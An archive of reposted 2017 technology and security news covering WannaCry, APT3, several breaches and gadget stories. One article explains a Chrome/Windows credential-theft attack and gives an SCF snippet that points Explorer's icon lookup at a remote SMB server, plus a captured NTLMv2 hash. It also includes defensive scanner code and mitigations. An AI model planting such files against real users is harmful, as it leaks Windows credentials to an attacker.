Category Archive: Uncategorized

Cyber Risk Management: What’s Holding Us Back?

Organizations Are Struggling to Operationalize Their Knowledge of Risk.

Over the past year, cyber risk management has gained a lot of attention in the media and among practitioners. Even though risk management has been proven to optimize business performance and lead to better investment decisions, many organizations have still not adopted this concept when it comes to their enterprise security model. Last week’s WannaCry ransomware attack is a stark reminder that a risk-based approach to security is long overdue. WannaCry is only the latest cyber-attack to expose the industry’s inability to find and fix the threats that really matter. So what’s holding organizations back from implementing cyber risk management?

Consider these facts… last Friday, the world faced the biggest cyber-attack yet, with more than 300,000 organizations in more than 200 countries falling victim to the WannaCry ransomware. The malware exploited a known vulnerability in the Microsoft Windows SMB Server, for which the vendor had provided a patch on March 14, 2017. Unfortunately, many organizations had not patched or were simply running on operating systems that had reached their end of life (e.g., Windows XP and Windows Server 2000) and do not receive new security updates. While the attack’s impact has been massive, the story behind it is very characteristic of any successful cyber-attack — hackers are exploiting known vulnerabilities and are betting on the fact that organizations don’t know how to fix what really matters.

That’s where cyber risk management comes into play. Many industry standard bodies (e.g., Payment Card Industry) and government regulators (e.g., Office of the Comptroller of the Currency, SEC) have taken steps to propagate the usage of risk management by incorporating its core principles into their regulations. These refreshed guidelines are designed to address several factors including scarcity of resources, the disruptive effect of big data in the context of cyber security, market volatility, regulatory changes, and the need for better, faster decision making.

However, many organizations are still struggling to operationalize their knowledge of risk in order to optimize business investments and performance. Let’s look at the factors that are preventing organizations from adopting a risk-based approach to security and what can be done to overcome them.

Risk Culture

When implementing cyber risk management practices, it is essential to instill a risk-aware culture at all levels and across all functional areas of the organization. Lack of buy-in from all stakeholders is one of the most common hurdles to making the transition from a compliance- to risk-driven approach to security. There are many examples of organizations that hired a first-time Chief Risk Officer in an attempt to force the transition, but failed due to the fact that the individuals required to implement the new practices on a day-to-day basis were still stuck in their antiquated compliance views. To be successful, risk management must avoid a gap between senior management and the rest of the organization when it comes to understanding and embracing risk management concepts and benefits. To address this roadblock, a well thought out training program is required for current and incoming employees.

Risk Management Perceptions

Although risk management was initially introduced to increase shareholder value, not all companies understand its benefits. It is important to realize that there is no one-size-fits-all approach; rather, the benefits and costs of risk management depend on factors such as organizational size, complexity, vertical industry, and location. Considering these factors when planning the scope of a cyber risk management implementation will increase the odds that its benefits will be more clearly understood and supported across the organization.

Risk Technology

Instead of relying on employees to implement cyber risk management in a silo-based fashion using antiquated tools such as spreadsheets to document their findings, organizations should consider the use of an intelligence-driven, platform-based system. Pitfalls to look out for include making sure that the derived risk scores are based on a scientific approach that takes a multitude of factors (e.g., vulnerability risk rating, IP reputation, accessibility, and business criticality) into account rather than singling out, for instance, just the external risk exposure of an organization. In this context, it is essential to ensure proper integration with internal security intelligence data sources, both to protect investments in existing IT and security tools and to unify that data with external threat data and business criticality.

Organizations that address the above-mentioned inhibitors to cyber risk management head-on can significantly reduce the time it takes to identify their cyber risk exposure, quickly orchestrate remediation, and monitor the results. In the case of the WannaCry outbreak, a properly implemented cyber risk management program would have identified the exposure and business criticality of the threat weeks prior to the attack, giving the organization plenty of time to patch systems in a controlled and orderly fashion.

 

via:  securityweek



APT3 Hackers Linked to Chinese Ministry of State Security

Independent researchers and experts from threat intelligence firm Recorded Future are confident that the cyber espionage group tracked as APT3 is directly linked to the Chinese Ministry of State Security (MSS).

While much of the security community typically tries to avoid making attribution statements, arguing that false flags make this task difficult, there are some individuals and companies that don’t shy away from accusing governments of conducting sophisticated cyberattacks.

A mysterious group called “intrusiontruth,” which claims to focus on investigating some of the most important advanced persistent threat (APT) actors, has recently published a series of blog posts on APT3, a group that is also known as UPS Team, Gothic Panda, Buckeye and TG-0110.

The cyberspies, believed to be sponsored by China, have been active since at least 2009, targeting many organizations in the United States and elsewhere via spear-phishing, zero-day exploits, and various other tools and techniques. Researchers noticed last year that APT3 had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

Intrusiontruth has conducted an analysis of APT3’s command and control (C&C) infrastructure, particularly domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Both these individuals are listed as shareholders for a China-based security firm called the Guangzhou Boyu Information Technology Company, or Boyusec. In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that this company had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

Intrusiontruth concluded that either Boyusec has two shareholders with the same name as members of APT3, or Boyusec is in fact APT3, which is the more likely scenario.

Recorded Future has dug deeper to find more evidence connecting APT3 to China’s MSS. In a report published on Wednesday, the company said it had attributed the group directly to the MSS with “a high degree of confidence.”

Researchers pointed out that in addition to Huawei, which claimed to use Boyusec for security evaluations of its corporate intranet, Boyusec was also a partner of the Guangdong Information Technology Security Evaluation Center (Guangdong ITSEC), and the organizations have been collaborating on an active defense lab since 2014.

Guangdong ITSEC is apparently a subordinate of the China Information Technology Evaluation Center (CNITSEC), which, according to academic research, is run by the Ministry of State Security.

Experts believe many of the ministry’s subordinates, particularly ones at provincial and local levels, have legitimate public missions and act as a cover-up for intelligence operations.

“Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the resources and technology of the Chinese government. In this real-life David vs. Goliath situation, customers need both smart security controls and policy, as well as actionable and strategic threat intelligence,” Recorded Future said in its report.

 

via:  securityweek



Watts is a huge battery that powers your home

Like Tesla’s Powerwall, Watts is a big battery that can power your home. One Watts cell can support a few small appliances including computers and refrigerators and a few units can power TVs and electric washers. The units can charge via the grid or with solar panels and the Watts units include an app that shows discharge and battery remaining.

The batteries, which were designed in Russia, are stackable, which means you can add as many or as few units to your power network as you like. They can also send energy back onto the grid as necessary. Each unit offers 1.5 kW with a 3 kW peak and a capacity of 1.2 kWh.

The company is shipping batteries in August and one unit costs $2,999. They aim to be the LEGO of high-end home batteries, allowing you to add some real power storage to your home, office, or Zombie-proof bunker.

 

via:  techcrunch



reVIVE is a VR solution for diagnosing ADHD built by high school students

The first team to go onstage at the Disrupt NY 2017 Hackathon showed off reVIVE, a virtual reality solution for diagnosing ADHD. The team of three high school juniors wanted to create a solution that would simplify the lengthy and expensive process of diagnosing the illness.

The team tells me that ADHD normally takes six to nine months to diagnose, and that process alone can cost patients thousands of dollars.

The reVIVE tool is composed of three different tests that gauge the user’s motor skills, sustained concentration and reaction time. Users are asked to perform tasks like navigating a maze, touching colored objects as they light up certain colors and standing still within a defined space. The team created a scoring system to measure a user’s performance that will allow medical professionals to gain a clearer picture of their situation within minutes.

Check out this video:

https://videos.vidible.tv/prod/2017-05/14/591878b8e0fa173c33a9a851_640x360_v1.mp4?6So8hqrOWSsiVtErp9rL3Djq7_jSSheSWCEVSk_9dEG3tY7H_AFGEJxaKskXeGg-

Akshaya Dinesh, 17; Sowmya Patapati, 16; and Amulya Balakrishnan, 17, built the virtual reality app for the HTC Vive using Unity. The team of New Jersey high school students met and became friends at the hackathon. Balakrishnan and Patapati work with the organization #BUILTBYGIRLS.

“We really wanted to quantify ADHD diagnoses,” said Dinesh. “When you’re immersed in a 360 environment, patients experience the environment as if they’re really there.”

The team isn’t trying to replace the role of therapists when it comes to treatment, but they believe that the app can serve as a telemedicine tool, alerting a user’s therapist to their latest performance inside the app, while analyzing the data over time thanks to IBM Watson.

Medical diagnosing and treatment have already proven to be a major use case for virtual reality. Companies like MindMaze have already achieved unicorn status catering their VR solutions directly to medical professionals. The team believes that diagnosing illnesses is one of “the best use cases possible for VR.”

 

via: techcrunch



Test-approved app could kill off the graphing calculator

Students can kiss $150 calculators goodbye.

Math students have a love-hate relationship with the funky, expensive TI-84 graphing calculators, but thanks to a new deal, they’ll soon get a free option. Starting this spring, pupils in 14 US states will be able to use the TI-like Desmos online calculator during standardized testing run by the Smarter Balanced consortium. “We think students shouldn’t have to buy this old, underpowered device anymore,” Desmos CEO Eli Luberoff told Quartz.

The Desmos calculator will be embedded directly into the assessments, meaning students will have access during tests with no need for an external device. It’ll also be available to students in grades 6 through 8 and high school throughout the year. The calculator is free to use, and the company makes money by charging organizations to use it, according to Bloomberg.

The Desmos calculator is more advanced than the TI-84 or other devices, offering a friendlier interface, live graphing updates, and free access via a smartphone, tablet or any other connected device. Thanks to an earlier deal with Smarter Balanced, it also provides accessibility features for the blind and visually impaired. It’s used by students in 146 countries and racks up over 300,000 hours of use per month, the company says.


Not cheap: the TI-84 graphing calculator (Getty Images)

TI has monopolized the graphing calculator market for years, but Desmos has made rapid inroads since it launched its calculator app in 2011. It’s backed by the world’s largest education company, Pearson PLC, which uses it for its enVision high-school math program. It’s also supported by SAT exam administrator The College Board, which endorses it for drills, practice exams and curriculum assessments.

There are lots of online graphing calculators available, but educators are reluctant to allow them during tests. “Our products include only the features that students need in the classroom, without the many distractions or test security concerns that come with smartphones, tablets and internet access,” Texas Instruments’ Peter Balyta told Bloomberg.

However, the Desmos and Smarter Balanced consortium’s deal negates that concern by embedding the calculator directly into the test, cutting off any outside access. That means students can use the calculator app while studying and have access to the same tech during tests, without needing to spend a bundle on a TI-84 or other calculator. The need for pricey calculators is “a huge source of inequity, and it’s just not the best way to learn,” says Luberoff.

 

via:  engadget



Nintendo is planning a Legend of Zelda mobile game

Following up on the massive success of Pokémon GO and the, well, slightly less massive success of Super Mario Run, Nintendo is reportedly planning a Legend of Zelda game for smartphones for release later this year, or so The Wall St Journal’s sources have it.

Details beyond that are scarce; it would supposedly follow the release of the also-rumored Animal Crossing mobile game, presumably once everyone has played that into the ground.

How exactly they expect to represent the expansive exploring, puzzling and battling that have defined the series heretofore is unclear. Super Mario Run took a minimalist approach to controls, essentially reducing the platformer to a one-button game.

That would be rather difficult with the vastly more complex Zelda series — doubly so considering the improbably well-received Breath of the Wild was so vast and unrestricted. Whether the company would repeat its pricing strategy for Mario is also unknown; sales weren’t quite what it had hoped.

We’ll likely know more soon; Super Mario Run was announced three months ahead of its release. But if the timing hinted at by the WSJ’s sources is correct, we’ll hear about the Animal Crossing game first, though who knows when.

 

via:  techcrunch



Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10, that could allow remote hackers to steal user’s login credentials.

Researcher Bosko Stankovic of DefenseCode has found that merely visiting a website containing a malicious SCF file could lead victims to unknowingly share their computer’s login credentials with hackers via Chrome and the SMB protocol.


This technique is not new: it was exploited by Stuxnet, a powerful piece of malware specially designed to disrupt Iran’s nuclear program, which used Windows shortcut (LNK) files to compromise systems.

What makes this attack different is that such SMB authentication attacks have now been publicly demonstrated on Google Chrome for the first time, after Internet Explorer (IE) and Edge.

Chrome + SCF + SMB = Stealing Windows Credentials

The SCF (Shell Command File) shortcut format works similarly to LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.

Basically, shortcut links on your desktop are text files with a specific shell syntax that defines the location of the icon/thumbnail, the application’s name and its location:

[Shell]
Command=2
IconFile=explorer.exe,3

Since Chrome trusts Windows SCF files, attackers can trick victims into visiting a website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target system without prompting the user for confirmation.

As soon as the user opens the folder containing the downloaded file, immediately or later, Explorer automatically processes the file to retrieve its icon, without the user having to click on it.


But instead of pointing at a local icon image, the malicious SCF file created by the attacker contains the location of a remote SMB server (controlled by the attacker):

[Shell]
IconFile=\\170.170.170.170\icon

So, as soon as Explorer attempts to retrieve the icon image named in the SCF file, it is tricked into automatically authenticating to the attacker-controlled remote server over the SMB protocol, handing over the victim’s username and a hashed version of the password, which allows the attacker to use those credentials to authenticate to the victim’s computer or network resources.

“Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares,” Stankovic said.


But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources, so they are no longer vulnerable to attacks that made them load malicious content from outside servers.


However, SCF files were left alone.

 

Exploiting LM/NTLM Hash Authentication via SCF File (Image Source: SANS)

But why would your Windows PC automatically hand over your credentials to the server?
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in 4 steps:

  • The Windows user (client) attempts to log into a server.
  • The server responds with a challenge value, asking the client to encrypt the challenge with the user’s password hash and send the result back.
  • Windows handles the SCF request by sending the client’s username and the hashed version of the password to the server.
  • The server then captures that response and approves authentication if the client’s password hash is correct.

Now, in the SCF attack scenario elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically by providing the victim’s username and NTLMv2 password hash (for a personal computer or a network resource) to the server, as described in step 3 above.
If the user is part of a corporate network, the network credentials assigned to the user by his company’s sysadmin will be sent to the attacker.

If the victim is a home user, the victim’s Windows username and password will be sent to the attacker.

 

[*] SMB Captured – 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

No doubt, the credentials are encrypted, but they can be “brute-forced” later to retrieve the original login password in plain text.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings,” the researcher said. “Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.”
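Both points above, the IconFile value that drags Explorer to a remote SMB host and the always-hidden .scf extension, can be checked for defensively. The following Python scanner is an added example, not the researcher’s code: it parses the [Shell] section of each .scf file in a folder, reports any UNC icon target and the name Explorer would display, and uses constructed sample files with a documentation-range address (203.0.113.10) in place of a real remote server.

```python
"""Sweep a folder for SCF shortcut files whose icon would be fetched over SMB.

Added example, not the DefenseCode researcher's code. It parses the INI-like
[Shell] section of each .scf file, flags IconFile values that point at a UNC
path (double-backslash host), and shows the name Explorer would display, since
the .scf extension is always hidden. The sample files are constructed and
203.0.113.10 is a documentation-range address standing in for a remote server.
"""
import ipaddress
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Optional

# \\host\share... : capture the host between the leading "\\" and the next "\"
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# IconFile may end with an icon index, e.g. "explorer.exe,3"; strip it first
ICON_INDEX_RE = re.compile(r",\s*-?\d+\s*$")
# Ranges treated as internal; any other IP is an external SMB destination
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class Finding:
    path: str
    displayed_name: str         # what Explorer shows: "picture.jpg" for picture.jpg.scf
    icon_target: str
    remote_host: Optional[str]  # UNC host, or None for a local icon
    external: Optional[bool]    # IP outside INTERNAL_NETS? None for a bare name
    verdict: str                # "remote-icon", "local-icon" or "no-icon"


def parse_shell_section(text: str) -> dict:
    """Return the key/value pairs of the [Shell] section, keys lower-cased."""
    section, shell = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "shell" and "=" in line:
            key, _, value = line.partition("=")
            shell[key.strip().lower()] = value.strip()
    return shell


def icon_host(icon_value: str) -> Optional[str]:
    """Host of a UNC IconFile value, or None when the icon is a local file."""
    path = ICON_INDEX_RE.sub("", icon_value).strip().strip('"')
    match = UNC_RE.match(path)
    return match.group(1) if match else None


def host_is_external(host: str) -> Optional[bool]:
    """True for an IP outside INTERNAL_NETS, False for an internal IP, None for a name."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # DNS/NetBIOS name: would need resolution to judge
    return not any(addr in net for net in INTERNAL_NETS)


def classify(path: str) -> Finding:
    """Parse one .scf file and decide whether opening its folder triggers an SMB fetch."""
    name = os.path.basename(path)
    displayed = name[:-4] if name.lower().endswith(".scf") else name
    with open(path, encoding="utf-8", errors="replace") as fh:
        icon = parse_shell_section(fh.read()).get("iconfile", "")
    host = icon_host(icon) if icon else None
    verdict = "no-icon" if not icon else ("local-icon" if host is None else "remote-icon")
    return Finding(path, displayed, icon, host,
                   host_is_external(host) if host else None, verdict)


def scan_dir(directory: str) -> list:
    """Recursively classify every .scf file below directory."""
    return [classify(os.path.join(root, f))
            for root, _, files in os.walk(directory)
            for f in files if f.lower().endswith(".scf")]


def demo() -> dict:
    """Write two constructed SCF files to a temp folder and return findings by displayed name."""
    d = tempfile.mkdtemp()
    # the benign Explorer shortcut quoted in the article
    with open(os.path.join(d, "My Computer.scf"), "w", newline="") as fh:
        fh.write("[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n")
    # same layout, but the icon lives on a remote SMB share (constructed address)
    with open(os.path.join(d, "picture.jpg.scf"), "w", newline="") as fh:
        fh.write("[Shell]\r\nIconFile=\\\\203.0.113.10\\icon\r\n")
    return {f.displayed_name: f for f in scan_dir(d)}


if __name__ == "__main__":
    for shown, f in demo().items():
        print(f"{shown!r:>14} -> {f.verdict:<12} host={f.remote_host} external={f.external}")
```

Point scan_dir at a Downloads folder to sweep real files; a "remote-icon" finding with external=True is exactly the file Explorer would authenticate for as soon as the folder is opened.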

No Need to Decrypt Password *Sometimes*

Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.


Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations, as they enable attackers to impersonate one of their members and immediately reuse the gained privileges to escalate access, take control of IT resources, and attack other members.

How to Prevent Such SMB Authentication-related Attacks

Simply block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers cannot query remote SMB servers.
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then checking the “Ask where to save each file before downloading” option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to users.

 

via:  thehackernews



Bell Canada Hacked: Data of 1.9 Million Customers Stolen

While we were all busy with the WannaCry ransomware menace, two separate data breaches were reported, one at DocuSign, a major provider of electronic signature technology, and another at Bell, Canada’s largest telecommunications company.

 
Canadian mobile phone, TV, and internet service provider Bell on Monday confirmed that the company had been hit by an unknown hacker who has managed to access its customer information illegally.


In a brief statement released by Bell Canada, the company said an unknown hacker had managed to get his hands on the data of millions of Bell customers.

However, the company did not say which particular service the stolen customer details were pulled from.


The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.

How Many Victims Were Affected?

Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.

“The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers,” the company said.

However, Bell assured its customers that there is no indication the hacker accessed “financial, password or other sensitive personal information,” and that the incident is not linked to the global WannaCry ransomware attacks.

What’s the Missing Link?

The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.

“We are releasing a significant portion of Bell.ca’s data due to the fact that they have failed to [co-operate] with us,” reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.

“This shows how Bell doesn’t care for its [customers’] safety and they could have avoided this public announcement… Bell, if you don’t [co-operate], more will leak :).”

There is still no explanation of who is behind the extortion demand or what sort of cooperation the hackers were seeking, but it appears Bell Canada refused to pay the ransom demand.


However, this information remains unconfirmed.

What is Bell Canada doing? Canada’s largest telecommunications company said it is working with Canadian law enforcement authorities to figure out who was responsible for the attack.

“We apologize to Bell customers for this situation and are contacting those affected directly,” the company said.

“Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner.”

What should Bell Canada customers do?

While Bell Canada believes there is “minimal risk involved for those affected” by the attack, having access to customer information, including email addresses, names and/or telephone numbers, opens the opportunity for targeted phishing attacks to customers.

 
So, users should be particularly alert to any phishing email, which is usually the next step cyber criminals take after a breach to trick users into giving up further details such as financial information.

 
For the obvious reasons, all Bell Canada customers are highly recommended to change their passwords as soon as possible.

 

via:  thehackernews



Over 200 Brooks Brothers Stores Hit by Payment Card Breach

U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers or other personally identifiable information was not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.

 

via:  securityweek



NSA tools behind worldwide WanaCryptOr ransomware attack

A ransomware attack leveraging alleged NSA hacking tools that began hitting the U.K. National Health Service earlier today has spread globally, impacting FedEx and Spanish telecom Telefonica, and locking up tens of thousands of computers in 74 countries.

Early analysis has found that the attackers dropped WanaCryptOr 2.0 ransomware using an exploit tool released last month by the Shadow Brokers hacking group. The ransomware, also known as Wannacry, displays a ransom note demanding $300 in Bitcoin that must be paid within three days. The most widely hit countries so far are the Russian Federation, Ukraine, India and Taiwan, according to Kaspersky Labs. About 60,000 computers in total are infected.

The attacker has not yet been named; however, a 22-year-old independent cybersecurity researcher who tweets at @MalwareTechBlog and blogs at MalwareTech is being credited with helping mitigate the attack on Friday. He discovered that the malware, once injected into a target computer, attempted to contact a command and control website, the Telegraph reported. If the target computer was unable to connect to that website, the ransomware activated and took the computer hostage. However, if the target computer was able to successfully contact the remote website, the malware simply terminated itself and did not install the ransomware.

The researcher was able to use this to his advantage. The remote domain was for sale, so he bought it for a small sum; once the registration went live, infected computers began connecting to it, effectively turning off the attack.

“A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB host, which i provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all,” he wrote.

However, before the researcher was able to enact his plan the ransomware had spread globally.

“The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet,” wrote Malwarebytes researcher Pieter Arntz.

Courtesy of Malwarebytes

The vulnerability MS17-010 is also known as ETERNALBLUE, which was patched by Microsoft in March, and is used to inject the backdoor malware DoublePulsar, according to Cyberscoop. The malicious actors then use the backdoor to infect the target machine with WanaCryptOr.

The initial entry into a company is most likely through a phishing attack.

“It would be shocking if the NSA knew about this vulnerability, but failed to disclose it to Microsoft until after it was stolen. It is past time for Congress to enhance cybersecurity by passing a law that requires the government to disclose vulnerabilities to companies in a timely manner. Patching security holes immediately, not stockpiling them, is the best way to make everyone’s digital life safer,” said Patrick Toomey, a staff attorney with the American Civil Liberties Union’s National Security Project.

“The speed with which it’s spreading is frightening. Ransomware becomes a significant nuisance if full backups of the systems weren’t taken, dramatically increasing the recovery time if the ransom isn’t paid,” said Gavin Millard, Tenable EMEA technical director.

The scattershot nature of the attack has also raised eyebrows with it hitting a variety of industries and countries.

“This kind of attack is indiscriminate in its nature, it will attack any machine that is not patched for the particular vulnerability, in this case MS17-010, that it is exploiting. This appears to be financially motivated, however that doesn’t mean that there aren’t other potential scenarios,” Owen Connelly, VP services at IOActive, told SC Media.

Phil Richards, CISO with Ivanti, called the persistent nature of this attack strong, with infected systems – at least those that do not pay the ransom – having to be powered down and rebuilt from scratch. Also, all backups have to be pulled off the network so they do not become ensnared.

“It isn’t surprising that NHS haven’t gotten to root cause yet. Since 90% of this type of ransomware comes in through phishing, my assumption went with the numbers. This ransomware enumerates accounts and systems when it infects a machine, so spreading to servers is also expected. Servers are more consistently available on the network than workstations. So far, this appears to be a Windows only ransomware, not affecting Linux or Mac.”

Because the attack is taking advantage of an already patched vulnerability some experts are calling it a failure on behalf of the victims to have left their systems unpatched.

“This is an example of the systemic failure of government and commercial firms to implement security, resiliency and appropriate privacy policies,” said Philip Lieberman, president of Lieberman software.

John Bambenek, threat research manager at Fidelis Cybersecurity, said that the WannaCry attack demonstrates the serious consequences that can occur when a nation-state’s zero-day exploit is leaked into the wild, even after a patch is developed. “This is the first time that a worm-like tool has been used in conjunction with ransomware that has created devastating impact against entire organizations,” said Bambenek. “Strong and swift patching would have helped mitigate this threat. It has undoubtedly captured the imagination of criminals who don’t want to hold individual machines ransom but to take entire organizations hostage and surely we will see much more of this in the coming weeks.”

 

via:  scmagazine

